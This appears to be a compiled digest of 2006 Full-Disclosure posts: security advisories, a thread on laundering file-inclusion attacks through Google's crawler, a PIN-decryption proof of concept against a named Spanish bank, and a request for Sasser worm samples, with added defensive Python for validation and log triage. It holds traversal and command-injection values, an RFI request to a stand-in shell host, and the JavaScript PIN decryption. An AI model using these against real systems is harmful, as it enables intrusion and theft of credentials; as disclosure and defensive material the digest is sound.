[Full-disclosure] [ GLSA 200611-22 ] Ingo H3: Folder name shell command injection
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                    Gentoo Linux Security Advisory           GLSA 200611-22
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Ingo H3: Folder name shell command injection
      Date: November 27, 2006
      Bugs: #153927
        ID: 200611-22

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Ingo H3 is vulnerable to arbitrary shell command execution when handling
procmail rules.

Background
==========

Ingo H3 is a generic frontend for editing Sieve, procmail, maildrop and
IMAP filter rules.

Affected packages
=================

    -------------------------------------------------------------------
     Package                 /  Vulnerable  /                Unaffected
    -------------------------------------------------------------------
  1  www-apps/horde-ingo         < 1.1.2                       >= 1.1.2

Description
===========

Ingo H3 fails to properly escape shell metacharacters in procmail rules.

Impact
======

A remote authenticated attacker could craft a malicious rule which could
lead to the execution of arbitrary shell commands on the server.

Workaround
==========

Don't use procmail with Ingo H3.

Resolution
==========

All Ingo H3 users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=www-apps/horde-ingo-1.1.2"

References
==========

  [ 1 ] CVE-2006-5449
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5449

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200611-22.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
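The advisory describes the defect class (a user-controlled folder name written into a generated procmail rule without shell metacharacters being handled) but not the fix. The following is an added Python illustration of the check a rule generator needs, written for this page; it is not Ingo's code, the recipe layout is a generic procmail recipe rather than Ingo's template, and the allowed folder-name character set is an assumption for the example. Folder names are allow-listed rather than escaped, and the literal subject text is regex-escaped so it cannot widen the match.

```python
"""Added example, not Ingo's code: validate a user-supplied folder name before it is
written into a procmail recipe, and escape the subject literal used in the condition."""
import re

# Assumption for the example: folders are relative to the maildir and limited to this set.
FOLDER_RE = re.compile(r"[A-Za-z0-9._/-]+")

# Characters procmail/egrep treat as regex metacharacters in a condition line.
REGEX_META = re.compile(r"([.*+?^$\[\]()|\\{}])")


class UnsafeFolderName(ValueError):
    """Raised instead of trying to escape shell or procmail metacharacters."""


def validate_folder(folder):
    """Accept only plain relative folder names; refuse everything else outright."""
    if not isinstance(folder, str) or not FOLDER_RE.fullmatch(folder):
        raise UnsafeFolderName(repr(folder))
    if folder.startswith("/") or ".." in folder.split("/"):
        raise UnsafeFolderName(repr(folder))
    return folder


def procmail_regex_escape(text):
    """Backslash-escape regex metacharacters so the subject is matched literally."""
    return REGEX_META.sub(r"\\\1", text)


def subject_to_folder_recipe(subject, folder):
    """Build a delivering recipe: mail whose Subject contains `subject` goes to `folder`."""
    folder = validate_folder(folder)
    return (":0:\n"
            "* ^Subject:.*" + procmail_regex_escape(subject) + "\n"
            + folder + "\n")


def rejected(folder):
    """True when the generator would refuse this folder name."""
    try:
        validate_folder(folder)
    except UnsafeFolderName:
        return True
    return False


if __name__ == "__main__":
    print(subject_to_folder_recipe("Weekly report", "Lists/work"))
    # Constructed sample names carrying shell metacharacters; all are refused.
    for name in ("inbox;id", "$(id)", "a`b`", "../other", "Archive.2006"):
        print(repr(name), "rejected" if rejected(name) else "accepted")
```

Refusing rather than escaping is the safer choice here because the same folder string may be consumed by procmail, by a shell and by the filesystem, and the escaping rules of the three differ.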
[Full-disclosure] Cursor snarfing - a new class of vulnerability and attack in Oracle
Hey all,

I've just written a paper detailing a fairly common PL/SQL programming error related to cursors that leads to a new class of vulnerability in Oracle. You can get a copy of the paper from http://www.databasesecurity.com/ .

Cheers,
David Litchfield
NGSSoftware Ltd
+44(0) 208 401 0070
http://www.ngssoftware.com/
Re: [Full-disclosure] Anonymizing RFI Attacks Through Google
On Sat, Nov 25, 2006 at 01:01:54AM -0500, Dude VanWinkle wrote:
> On 11/25/06, endrazine [EMAIL PROTECTED] wrote:
> > this process of attack is a mere waste of time if one only reaches anonymity : in order to give google this new url to crawl, you'd have to either create a web page that points to this very page, or enter the url in the google database directly using their form. None of those two options are safer than attacking the website directly (google might very well log your actions), so what's the point ?
>
> a lot of people are used to seeing google spider tracks in their logs. anonymizing your attack via google may make the admin investigating the attack think that a malfunctioning web bot was responsible for the attack, or they may skim over the entire incident accidentally.

Even if you are aware of an attack, the Google bot will not tell you where the attacking URL comes from. So, if you're investigating the hack, you have no data; you need to get Google to cooperate with you, so they can find where the URL came from, and then investigate from there. That adds Google as an additional cut-out and delays any investigation.

--
Vincent ARCHER
[EMAIL PROTECTED]

Tel : +33 (0)1 40 07 47 14
Fax : +33 (0)1 40 07 47 27
Deny All - 23, rue Notre Dame des Victoires - 75002 Paris - France
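The thread's point for the investigating admin is that a remote-file-inclusion request arriving with a crawler user-agent should neither be dismissed as bot noise nor be assumed to come from the crawler. The following added Python example (written for this page, not code from any poster) shows the two checks that separate the cases over constructed log lines: flag query parameters whose value is an absolute URL, and confirm a claimed Googlebot by forward-confirmed reverse DNS (IP to hostname in googlebot.com or google.com, hostname back to the same IP). The log layout regex, the sample IPs, hostnames and URLs are all constructed for the example; the DNS resolvers are injected so it runs offline, with socket-based ones provided for real use.

```python
"""Added example: triage RFI-shaped requests and verify crawler identity on sample log lines."""
import re
import socket
from urllib.parse import urlsplit, parse_qsl

# Assumption: combined log format (client, ident, user, [time], "request", status, size, referer, UA).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
CRAWLER_DOMAINS = ("googlebot.com", "google.com")


def rfi_parameters(target):
    """Query parameters whose value is an absolute URL: the remote-file-inclusion signature."""
    return {k: v for k, v in parse_qsl(urlsplit(target).query, keep_blank_values=True)
            if re.match(r"^(https?|ftp)://", v, re.IGNORECASE)}


def verify_crawler(ip, reverse_lookup, forward_lookup):
    """Forward-confirmed reverse DNS: ip -> allowed hostname -> the same ip again."""
    try:
        name = reverse_lookup(ip).rstrip(".").lower()
    except OSError:
        return False
    if not any(name == d or name.endswith("." + d) for d in CRAWLER_DOMAINS):
        return False
    try:
        return ip in forward_lookup(name)
    except OSError:
        return False


def triage(log_lines, reverse_lookup, forward_lookup):
    """Return (ip, verdict, rfi_params) for every RFI-shaped request in the lines."""
    results = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        params = rfi_parameters(m.group("target"))
        if not params:
            continue
        claims_google = "googlebot" in m.group("ua").lower()
        if claims_google and verify_crawler(m.group("ip"), reverse_lookup, forward_lookup):
            verdict = "rfi-shaped request from verified Googlebot (crawler followed a poisoned link)"
        elif claims_google:
            verdict = "rfi attempt with forged Googlebot user-agent"
        else:
            verdict = "rfi attempt"
        results.append((m.group("ip"), verdict, params))
    return results


def dns_reverse(ip):
    """Real PTR lookup for production use."""
    return socket.gethostbyaddr(ip)[0]


def dns_forward(name):
    """Real A-record lookup for production use."""
    return socket.gethostbyname_ex(name)[2]


# Constructed sample data: documentation-range IPs, made-up hostnames and URLs.
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Nov/2006:14:32:22 -0800] "GET /index.php?page=http://203.0.113.5/shell.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0 (compatible; Googlebot/2.1)"',
    '198.51.100.7 - - [26/Nov/2006:14:33:01 -0800] "GET /index.php?page=http://203.0.113.5/shell.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0 (compatible; Googlebot/2.1)"',
    '198.51.100.8 - - [26/Nov/2006:14:33:05 -0800] "GET /index.php?page=about HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]
FAKE_PTR = {"192.0.2.10": "crawl-192-0-2-10.googlebot.com"}   # constructed
FAKE_A = {"crawl-192-0-2-10.googlebot.com": ["192.0.2.10"]}   # constructed


def fake_reverse(ip):
    if ip not in FAKE_PTR:
        raise OSError("no PTR record")
    return FAKE_PTR[ip]


def fake_forward(name):
    return FAKE_A.get(name, [])


if __name__ == "__main__":
    for ip, verdict, params in triage(SAMPLE_LOG, fake_reverse, fake_forward):
        print(ip, verdict, params)
```

A verified-crawler hit is still an incident: the crawler found the poisoned link somewhere, and the vulnerable parameter is the same either way. The verdict only changes where the investigation goes next.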
[Full-disclosure] Defeating Image-Based Virtual Keyboards and Phishing Banks (fwd)
Copied from a post by Noam Rathaus on the SecuriTeam Blogs, following up a post by HispaSec. This is about breaking virtual keyboard implementations, and the encryption some of them use (most of them send the data in clear text with the image). HispaSec was a reference by which we found the bank's site as one using a virtual keyboard.

http://blogs.securiteam.com/index.php/archives/678
http://hispasec.com/laboratorio/cajamurcia_en.htm

Gadi.

Quoting:

Recently, I stumbled upon a post by HispaSec showing off a screen shot trojan (http://hispasec.com/laboratorio/cajamurcia_en.htm) which nicely showed how a trojan horse can, utilizing key stroke capture and screenshot capture, grab a user's PIN number fairly easily, and wondered why they are taking this approach when the PIN numbers can be easily retrieved by sniffing the data sent by the user to the banking site, even though they are encrypted.

Image based keyboards (or virtual keyboards) were invented to make life harder for banking or phishing trojan horses (specifically key-stroke loggers or key loggers); some even suggested they be used specifically to avoid these trojan horses. The bad guys adapted to this technology and escalated. Now the trojan horses take screenshots of where the mouse pointer is to determine what number they clicked on.

Thing is, it is often unnecessary, as in most implementations of this technique that we looked into (meaning, not all) it was flawed. Instead of sending the remote image and waiting for the key-stroke information to be sent back to the server (the technique against which the on-click pointer-location screenshots described above were used), some banks send the PIN number in cleartext, while others encrypt it; one such example is cajamurcia. Even when encryption is used, banks tend to implement it badly, making it easy to recover the PIN number from the encrypted form.

I investigated a bit more how cajamurcia handles such PIN strokes (with virtual keyboards) and I noticed something strange: they take the timestamp of their server (cajamurcia) and send it to you - this already poses a security problem - and this timestamp is then used to encrypt the PIN number you entered. This would have been a good idea if the timestamp was not sent back to the server, making it hard or semi-hard to guess the timestamp used to encrypt the data, but at the same time making it harder for the server to know what timestamp was provided to the client (unless they store it inside their session information). Anyhow, as it is sent back to the server, we have everything we need to decrypt the data (PIN number).

PoC:

A request to the server would look like:

  OPERACION=0002
  CAJA=2043
  CAMINO=2043
  PGDESTI=CORP
  BROKER=SI
  VRS=001
  PAN=2043123456
  SELLO=16100616012569
  CL=1161006956
  PINV3=si
  PANA=2043
  PANB=123456
  PIN=BBCB6E341C56C6B2
  IDIOMA=01

We are only interested in PIN=BBCB6E341C56C6B2 and CL=1161006956, CL being the timestamp and PIN being the encrypted form of the PIN number. If we feed these into the following JS code (the des() function comes from https://intelvia.cajamurcia.es/2043/01/scripts/MOD.js):

  // Turn a hex string (with or without a leading "0x") into a raw character string.
  function hexToString (h) {
    var r = '';
    for (var i = (h.substr(0, 2) == '0x') ? 2 : 0; i < h.length; i += 2) {
      r += String.fromCharCode(parseInt(h.substr(i, 2), 16));
    }
    return r;
  }

  calcula = '1161006956';                          // the CL value (timestamp) from the request
  ciphertext = hexToString('0xBBCB6E341C56C6B2');  // the PIN value from the request
  // des() is defined in MOD.js; the key is eight characters of the timestamp.
  // The last argument was empty in the original post.
  var cleartext = des(calcula.substr(2, 8), ciphertext, 0, 1, '');
  console.debug(cleartext);

We will get our original PIN number.

This isn't necessarily easier, as it requires data capture, which isn't always easy, but screen captures usually require either OCR or manual labor, which the above code does not.

One needs to remember that Javascript (or any client-side code and information) is indeed on the client's side and under the client's control. An attacker can kick it aside, or learn to emulate it and attack it - manipulate it.

Client-side encryption where the code and key are visible is pointless. No matter how much obfuscation or cross-frame and cross-file scripting is used, calling different functions and parameters, nor how many functions you obfuscate your code through, it can be read and manipulated.

We made several email and phone attempts over the past couple of months to reach cajamurcia and report this security issue to them. Gadi Evron even asked a couple of folks in Spain to help with contacting them by phone, even speaking directly to security folks there. We were unsuccessful.

The bank is already under attack by the overkill screenshot trojan horses. We release this information in full disclosure in the hope that many online commerce sites using similar techniques, or even sending the information in the clear, will fix their implementations of the virtual keyboard Click-Me Number-Images Schemes. These are broken by the use of the trojan horses we discussed, but that's a whole other story.

Noam Rathaus
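The structural flaw in the post is that the request carries both the ciphertext (PIN) and the value the key is derived from (CL). The following added Python example, written for this page and not code from the post or the bank, models that exchange. Python's standard library has no DES, so a keyed XOR stream from SHA-256 stands in for the des() call; what is reproduced faithfully is the key schedule (eight characters of the timestamp starting at offset 2, matching calcula.substr(2, 8)) and the parameter names. It also models the variant the post calls a better idea, where the timestamp is not echoed back, and shows the caveat a practitioner would add: the timestamp still travelled to the client over the same channel, so an observer who captured the server's earlier message has the key in that variant too. The PIN value is constructed; the timestamp is the one from the post.

```python
"""Added example: why a key that travels with (or alongside) the ciphertext gives no
confidentiality. The cipher is a labelled stand-in for the DES call in MOD.js."""
import hashlib
from urllib.parse import urlencode, parse_qs


def derive_key(timestamp):
    """Mirror of calcula.substr(2, 8): eight characters of the timestamp become the key."""
    return timestamp[2:10].encode()


def toy_cipher(key, data):
    """Stand-in for DES: XOR with a keystream derived from the key (symmetric, so it decrypts too)."""
    stream = hashlib.sha256(key).digest()
    return bytes(b ^ stream[i % len(stream)] for i, b in enumerate(data))


def client_request(pin, timestamp):
    """The scheme in the post: ciphertext in PIN, the timestamp it was made from echoed in CL."""
    ct = toy_cipher(derive_key(timestamp), pin.encode())
    return urlencode({"CL": timestamp, "PIN": ct.hex().upper(), "PINV3": "si"})


def client_request_no_echo(pin, timestamp):
    """The variant the post suggests: the server keeps the timestamp in its session instead."""
    ct = toy_cipher(derive_key(timestamp), pin.encode())
    return urlencode({"PIN": ct.hex().upper(), "PINV3": "si"})


def observer_recovers(request, seen_timestamp=None):
    """What someone holding the captured request gets back. `seen_timestamp` models an observer
    who also captured the server's earlier message carrying the timestamp; None means they did not."""
    params = {k: v[0] for k, v in parse_qs(request).items()}
    timestamp = params.get("CL", seen_timestamp)
    if timestamp is None:
        return None
    try:
        return toy_cipher(derive_key(timestamp), bytes.fromhex(params["PIN"])).decode()
    except UnicodeDecodeError:
        return None


def key_material_in_request(request, key_param="CL", cipher_param="PIN"):
    """Design check: does one message carry both the ciphertext and the value the key is derived from?"""
    params = parse_qs(request)
    return key_param in params and cipher_param in params


if __name__ == "__main__":
    pin, ts = "2468", "1161006956"          # PIN constructed; timestamp from the post
    echoed = client_request(pin, ts)
    print(echoed, "->", observer_recovers(echoed))
    quiet = client_request_no_echo(pin, ts)
    print(quiet, "->", observer_recovers(quiet), "/ with server message:",
          observer_recovers(quiet, seen_timestamp=ts))
```

Neither variant protects the PIN from anyone who sees the traffic; only the transport (TLS) does that, and nothing done in page script protects it from code running on the client.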
[Full-disclosure] Sasser or other nasty worm needed
I'm a high school network administration teacher looking for a creative means of teaching my students the importance of patch management. I was hoping to let a particularly nasty worm loose on a closed lab so my students could see what happens during an outbreak, but I'm running into a hitch - I can't find a worm that would spread quickly enough to be useful.

Does anyone have a copy of Sasser or a similar worm that they would be willing to send or link me to? Please contact me off-list. I would be happy to verify my identity as a high school teacher off-list as I'm sure that is a concern for most anyone who has what I am looking for. Please do not reply on list as I am not currently a member.

Thank you,
Chris
[Full-disclosure] MHL-2006-003 Public Advisory: mboard file creation issue
MHL-2006-004 - Public Advisory

+-----------------------+
| mboard Security Issue |
+-----------------------+

PUBLISHED ON
November 26th, 2006

PUBLISHED AT
http://www.mayhemiclabs.com/advisories/MHL-2006-004.txt
http://www.mayhemiclabs.com/wiki/wikka.php?wakka=MHL2006004

PUBLISHED BY
Mayhemic Labs
http://www.mayhemiclabs.com
security AT mayhemiclabs DOT com
GPG key: 0x56143F84

APPLICATION
MBoard - PHP message board
http://www.phpjunkyard.com/php-message-board.php

MBoard is a PHP message board script (a simple forum).

AFFECTED VERSIONS
Versions 1.22 and below

ISSUES
MBoard does not check the Post ID for malicious data when replying, allowing an attacker to create blank files on the system wherever the web server has write access.

Example: An attacker can reply to a message, and edit the orig_id variable to something malicious (../../../../../../tmp/ZOMGHAX). mboard will then create the specified file (appending the configured extension).

WORKAROUNDS
Enabling Magic Quotes will negate the issue.

SOLUTIONS
Upgrade to version 1.3

REFERENCES
MBoard - http://www.phpjunkyard.com/php-message-board.php

TIMELINE
October 11th, 2006    Vendor/Developer Notified
                      Vendor/Developer Response Received
October 25th, 2006    Vendor/Developer Followup
                      Vendor/Developer Response Received
November 16th, 2006   Vendor/Developer Followup
November 18th, 2006   New Version Released
November 26th, 2006   Advisory Released

ADDITIONAL CREDIT
N/A

LICENSE
Creative Commons Attribution-ShareAlike License
http://creativecommons.org/licenses/by-sa/2.5
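The advisory names the defect (the post id is used to build a filesystem path without being checked) but not the fix. The following is an added Python illustration of the check a reply handler should apply, written for this page; it is not mboard's code, and the message directory and extension are assumptions rather than mboard's real layout. The id must be a short decimal integer, and the resolved path is then confirmed to sit directly inside the message directory, so the traversal string from the advisory is refused before any file could be created.

```python
"""Added example, not mboard's code: derive a reply file path from a post id safely."""
import re
from pathlib import Path

# Bounded so an id cannot be absurdly large or carry anything but digits.
ID_RE = re.compile(r"[0-9]{1,9}")


class BadPostId(ValueError):
    """Raised for any id that is not a plain post number."""


def reply_file_path(messages_dir, orig_id, ext=".txt"):
    """Return the file a reply to `orig_id` would touch, or raise BadPostId."""
    # fullmatch, not match with $: "42\n" must not slip through.
    if not isinstance(orig_id, str) or not ID_RE.fullmatch(orig_id):
        raise BadPostId("post id must be a short decimal integer")
    base = Path(messages_dir).resolve()
    target = (base / (orig_id + ext)).resolve()
    # Defence in depth: even a validated id must stay directly inside the base directory.
    if target.parent != base:
        raise BadPostId("resolved path escapes the message directory")
    return target


def check_ids(messages_dir, ids):
    """Map each candidate id to True (accepted) or False (refused)."""
    verdicts = {}
    for candidate in ids:
        try:
            reply_file_path(messages_dir, candidate)
            verdicts[candidate] = True
        except BadPostId:
            verdicts[candidate] = False
    return verdicts


# Constructed candidates: a normal id, the advisory's traversal string, and edge cases.
SAMPLE_IDS = [
    "42",
    "../../../../../../tmp/ZOMGHAX",
    "42/../../etc/hosts",
    "",
    "-1",
    "4" * 20,
    "42\n",
    "42\x00",
]

if __name__ == "__main__":
    for candidate, ok in check_ids("messages", SAMPLE_IDS).items():
        print(repr(candidate), "accepted" if ok else "refused")
```

The allow-list check alone already refuses every sample; the parent-directory comparison is there so that a future change to the allowed id format (say, adding a separator) cannot quietly reopen the hole.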
[Full-disclosure] The state of JavaScript Hacking
Please accept my apologies if the following post has offended you in any way. The reason I posted it here is because I wanted to get this message heard by a wider audience. What better place to talk about this than the security mailing lists.

http://www.gnucitizen.org/blog/the-state-of-javascript-hacking/

In this post I would like to share a few thoughts with you about the importance of JavaScript and other under-appreciated web technologies and their impact on the computer security industry and our lives in general. The purpose of this is to bring more light on the matter. Although this topic is becoming clearer now, I can still see quite a lot of confused security professionals striving to comprehend the core principles of these, relatively new, types of attacks. In this article I hope that I will be able to present my view as briefly and accurately as possible.

As you might already know, JavaScript is becoming more and more popular among Web developers. The reason for this sudden growth is AJAX, which among other technologies brought some quite useful and exciting features. Historically, AJAX is nothing new. This technology has been known for ages, although as I said earlier it has started being implemented on a large scale just recently. One of the biggest AJAX evangelists to date is Google, which I believe is responsible for the AJAX hype in general. This is just a personal opinion.

AJAX and JavaScript are nothing new to security professionals, either. You can see that various attack vectors related to these technologies have been discovered in the past. I am not talking about browser vulnerabilities but pure design and implementation insecurities. Among them there are techniques such as XSS (a.k.a. Cross-site scripting) and CSRF (a.k.a. Cross-site request forgery). Both of them outline ways of performing information gathering, session hijacking and request forging.

From the user perspective this is very serious, but not that many companies have taken it seriously because they don't really understand them, I suppose. You are probably aware of XSS and CSRF because the state of JavaScript hacking today is based around them. However, because of them the security industry has never really understood their real potential. Simply put, performing session hijacking is not as interesting as sniffing the air, and forging someone's requests is just not as fun as obtaining remote access. Will that change?

What security professionals must understand is that JavaScript is not about web pages anymore. It is a technology that is currently overtaking every WEB frontline and the desktop too. JavaScript is used on servers, web pages and desktop applications. It is a bridge technology. WEB designers use JavaScript to glue visual elements while browser vendors glue desktops and servers. The technology is the same all over the place, which means less coding. That results in less money spent. Very utopian, I must say. If you have less overhead developing desktop and web applications with JavaScript, don't you think that attackers will have the same benefit? They can write cross-platform viruses that can compromise desktop and web applications at the same time. Code once, destruct everywhere!

Mozilla and Adobe are the biggest cheerleaders in this game. Microsoft is somewhere behind but they are quickly catching up. Mozilla with their XUL makes attackers' lives so much easier. It is not that the Mozilla browser is vulnerable to any specific type of attack, but the past has already proved many times that eventually someone will find an issue with the architecture. Then people will find the same mistake in other places. The Mozilla XUL is considered a true RIA (Rich Internet Application) platform that is currently the base of many open source products. All of them support JavaScript, CSS, Flash (if installed) and Java (if installed). If the developers of these applications don't have a deep understanding of the security implications of the Mozilla platform, the WEB will suddenly become a very dangerous place for them.

Adobe on the other hand is making the process of creating a browser so transparent that everyone, I mean everyone, even your grandma will be able to create one in seconds. I am talking about Adobe's Apollo framework, which is built on top of Flex. If you haven't heard of it go and research now. Come back later. Don't get me wrong, I will probably use this platform to write a few security tools, but just think about this for a second: developers will be able to write applications that will integrate the desktop with the WEB using already proven WEB technologies such as JavaScript, CSS, ActionScript, Flash and AJAX. I don't really know what Apollo's security model will be, but apparently you can do whatever you want as long as the application is installed on the host environment. BTW, you install applications with a single click. Moreover, given the fact that Flash is so widespread, I am almost 90% sure that Adobe will
[Full-disclosure] rPSA-2006-0218-1 ImageMagick
rPath Security Advisory: 2006-0218-1
Published: 2006-11-27
Products: rPath Linux 1
Rating: Major
Exposure Level Classification:
    Indirect User Deterministic Unauthorized Access
Updated Versions:
    ImageMagick=/[EMAIL PROTECTED]:devel//1/6.2.3.3-3.4-1

References:
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5456
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4601
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0082
    https://issues.rpath.com/browse/RPL-811
    https://issues.rpath.com/browse/RPL-389

Description:
    Previous versions of the ImageMagick package contained multiple vulnerabilities. Attacker-supplied malformed image files may allow arbitrary code execution as the running user.
[Full-disclosure] rPSA-2006-0219-1 info install-info texinfo
rPath Security Advisory: 2006-0219-1
Published: 2006-11-27
Products: rPath Linux 1
Rating: Minor
Exposure Level Classification:
    Indirect User Deterministic Unauthorized Access
Updated Versions:
    info=/[EMAIL PROTECTED]:devel//1/4.8-6.2-1
    install-info=/[EMAIL PROTECTED]:devel//1/4.8-6.2-1
    texinfo=/[EMAIL PROTECTED]:devel//1/4.8-6.2-1

References:
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4810
    https://issues.rpath.com/browse/RPL-810

Description:
    Previous versions of the texinfo package can be caused to execute arbitrary code contained in an intentionally malformed texinfo file. These texinfo commands are often run automatically when building software packages.
[Full-disclosure] REMLAB Web Mech Designer 2.0.5 Path Disclosure Vulnerability
Description:
REMLAB ( http://remlab.sourceforge.net/ ) is a fully functional cross-platform web-based Battlemech designer for the tactical board game Battletech ( http://www.classicbattletech.com/ ). REMLAB is built entirely on HTML, PHP, and JavaScript with AJAX functionality.

The vulnerability exists in the calculate.php script, which allows remote attackers to obtain sensitive information via an HTTP request to calculate.php that contains a wrong value in the Tonnage parameter. This causes the information to be leaked in an error message.

External References:
Mitre CVE: CVE-2006-5896
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5896
NVD NIST: CVE-2006-5896
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2006-5896
OSVDB: 30264
http://www.osvdb.com/displayvuln.php?osvdb_id=30264

Summary:
REMLAB is a fully functional cross-platform web-based Battlemech designer for the tactical board game Battletech. A security problem in the product allows attackers to gather the true path of the server-side script.

Release Date: November 27 2006

Severity:
Risk: Low

CVSS Metrics
Access Vector: Remote
Access Complexity: Low
Authentication: not-required
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
Impact Bias: Normal
CVSS Base Score: 2.3
Target Distribution on Internet: Low
Exploitability: Functional Exploit
Remediation Level: Workaround
Report Confidence: Uncorroborated

Vulnerability Impact: Attack
Host Impact: Path disclosure.

SecureScout Testcase ID: TC 17937

Vulnerable Systems:
REMLAB Web Mech Designer 2.0.5
http://sourceforge.net/project/showfiles.php?group_id=165798

Vulnerability Type:
Input Validation error - The calculate.php script has a flaw which leads to a Warning. This is an input validation fault, since the script does not test the data passed to it.

Vendor Status:
The Vendor was contacted on November 14th 2006, by email and phone. The Vendor has not responded. There is no official patch at this time.

Workaround:
Disable warning messages: modify in the php.ini file the following line:

  display_errors = Off

Example:

HTTP REQUEST
http://[TARGET]/[REMLAB-directory]/include/calculate.php?Tonnage=%60

REPLY
...
<b>Warning</b>: Division by zero in <b>D:\WWWRoot\username\calculate.php</b> on line <b>438</b><br />
,,0.00,,1,,2,,12,,12,,8,,8,,2,,2,,10,,0.0,,0.0
...

URL of Original Advisory:
http://www.netvigilance.com/advisory0007

Credits:
Jesper Jurcenoks
Co-founder netVigilance, Inc
www.netvigilance.com
http://www.netvigilance.com/
[Full-disclosure] [SECURITY] [DSA 1219-1] New texinfo packages fix multiple vulnerabilities
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA-1219-1                     [EMAIL PROTECTED]
http://www.debian.org/security/                              Noah Meyerhans
November 27, 2006
- --------------------------------------------------------------------------

Package        : texinfo
Vulnerability  : buffer overflow
Problem type   : local
Debian-specific: no
CVE Id(s)      : CVE-2005-3011 CVE-2006-4810
BugTraq ID     : 14854 20959

Multiple vulnerabilities have been found in the GNU texinfo package, a documentation system for on-line information and printed output.

CVE-2005-3011
    Handling of temporary files is performed in an insecure manner, allowing an attacker to overwrite any file writable by the victim.

CVE-2006-4810
    A buffer overflow in util/texindex.c could allow an attacker to execute arbitrary code with the victim's access rights by inducing the victim to run texindex or tex2dvi on a specially crafted texinfo file.

For the stable distribution (sarge), these problems have been fixed in version 4.7-2.2sarge2

Note that binary packages for the mipsel architecture are not currently available due to technical problems with the build host. These packages will be made available as soon as possible.

For unstable (sid) and the upcoming stable release (etch), these problems have been fixed in version 4.8.dfsg.1-4

We recommend that you upgrade your texinfo package.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.


Debian 3.1 (stable)
- -------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, m68k, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/t/texinfo/texinfo_4.7-2.2sarge2.dsc
    Size/MD5 checksum:      622 f146d738696417a3f14e04875066ef9a
  http://security.debian.org/pool/updates/main/t/texinfo/texinfo_4.7.orig.tar.gz
    Size/MD5 checksum:  1979183 72a57e378efb9898c9e41ca839554dae
  http://security.debian.org/pool/updates/main/t/texinfo/texinfo_4.7-2.2sarge2.diff.gz
    Size/MD5 checksum:    10614 07a591b00a79ba8e2acf13d7654bf3e8

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/t/texinfo/info_4.7-2.2sarge2_alpha.deb
    Size/MD5 checksum:   207720 1fce59e479c10386d5bab3d8aec99ddd
  http://security.debian.org/pool/updates/main/t/texinfo/texinfo_4.7-2.2sarge2_alpha.deb
    Size/MD5 checksum:   884956 93a3606294fd0059390b7da3c5803a1a

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/t/texinfo/info_4.7-2.2sarge2_amd64.deb
    Size/MD5 checksum:   191308 035c9fb7bffa818819e6e104218d5911
  http://security.debian.org/pool/updates/main/t/texinfo/texinfo_4.7-2.2sarge2_amd64.deb
    Size/MD5 checksum:   863680 8300c746fbb75231a09229f32f57d126

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/t/texinfo/info_4.7-2.2sarge2_arm.deb
    Size/MD5 checksum:   178812 d8781c075692500d4d6a799019697a72
  http://security.debian.org/pool/updates/main/t/texinfo/texinfo_4.7-2.2sarge2_arm.deb
    Size/MD5 checksum:   848862 4d31ba02e3004a5e290d6204ba402b19

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/t/texinfo/texinfo_4.7-2.2sarge2_hppa.deb
    Size/MD5 checksum:   867668 934d2a72b73c4342066f1fba21c35fff
  http://security.debian.org/pool/updates/main/t/texinfo/info_4.7-2.2sarge2_hppa.deb
    Size/MD5 checksum:   195122 07ea3515643ddb8dc29791802974ec40

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/t/texinfo/texinfo_4.7-2.2sarge2_i386.deb
    Size/MD5 checksum:   846972 eb370f53f4db1681ead784353f6711c4
  http://security.debian.org/pool/updates/main/t/texinfo/info_4.7-2.2sarge2_i386.deb
    Size/MD5 checksum:   179614 ee08c755b1eb00043173acfdae2420d7

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/t/texinfo/texinfo_4.7-2.2sarge2_ia64.deb
    Size/MD5 checksum:   912350 c99196682ffe5436a1f99da332e77f91
